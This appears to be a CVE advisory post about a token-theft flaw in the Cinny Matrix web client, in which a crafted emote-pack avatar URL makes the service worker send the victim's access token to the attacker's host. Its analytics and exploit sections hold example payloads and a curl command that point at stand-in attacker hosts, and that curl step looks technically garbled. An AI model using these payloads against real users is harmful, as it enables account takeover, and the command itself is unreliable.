Cinny, Token Theft via EmojiBoard, CVE(not provided) (Critical)

By /

Listen to this Post

How the mentioned CVE works:

  1. Attacker shares a Matrix room with victim and has permission to create room emotes.
  2. Attacker creates a malicious emote pack with a crafted `pack.meta.avatar` URL.
  3. The URL is not an MXC resource but an arbitrary HTTP/HTTPS address.
  4. EmojiBoard component incorrectly trusts this user-controlled avatar fallback.
  5. Victim opens the emoji or sticker picker inside that compromised room.
  6. Client fetches the malicious pack metadata including the attacker’s URL.
  7. The service worker intercepts all outbound GET requests.
  8. It checks if the request URL contains `/_matrix/client/v1/media/download` or .../thumbnail.
  9. The malicious URL includes those path fragments (e.g., `https://attacker.com/_matrix/client/v1/media/download/fake`).
  10. Service worker attaches the victim’s `Authorization: Bearer ` header to that request.
  11. No verification is performed that the request host matches the configured homeserver origin.
  12. The attacker’s server receives the GET request with the victim’s Matrix access token.
  13. Attacker can then impersonate the victim in the Matrix network.
  14. The vulnerability requires victim to be logged in (authenticated).
  15. No user interaction beyond opening the emoji/sticker picker is needed.
  16. Attack vector is remote and requires the attacker to already share a room (e.g., DM).
  17. The flaw exists in Cinny web app versions before v4.10.3.
  18. Root cause 1: missing validation of `pack.meta.avatar` as MXC URL.
  19. Root cause 2: service worker lacks host origin check for media path prefixes.
  20. Patched by converting avatar to MXC and restricting token attachment to same origin.

    dailycve form:

    Platform: Cinny web app
    Version: < v4.10.3
    Vulnerability: Token theft via emoji
    Severity: Critical
    date: 2026-05-07

    Prediction: Patch v4.10.3 available

    Analytics under What Undercode Say:

    Check service worker behavior for token leakage
grep -rn "Authorization" cinny-service-worker.js | grep "_matrix/client/v1/media"
Simulate malicious emote pack meta
curl -X POST -H "Authorization: Bearer YOUR_TOKEN" \
"https://cinny.example/_matrix/media/v3/create" -d '{"avatar":"https://attacker.com/_matrix/client/v1/media/download/evil"}'
Monitor network for unauthorized token transmission
tcpdump -i any -A -s 0 'host attacker.com and port 443' | grep "Bearer"

    how Exploit:

– Attacker sends room invite, creates custom emote pack with "avatar":"https://evil.com/_matrix/client/v1/media/download/x".
– Victim opens emoji picker → browser sends `GET` to evil.com with Authorization: Bearer victim_token.

Protection from this CVE

  • Upgrade Cinny to v4.10.3 or later.
  • Validate all `mxc://` URLs before rendering, reject non‑matrix hosts.
  • Modify service worker to attach tokens only for requests matching homeserver origin.

Impact:

Complete account takeover of victim in Matrix. Attacker can read private messages, join rooms, modify profile, and escalate access.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top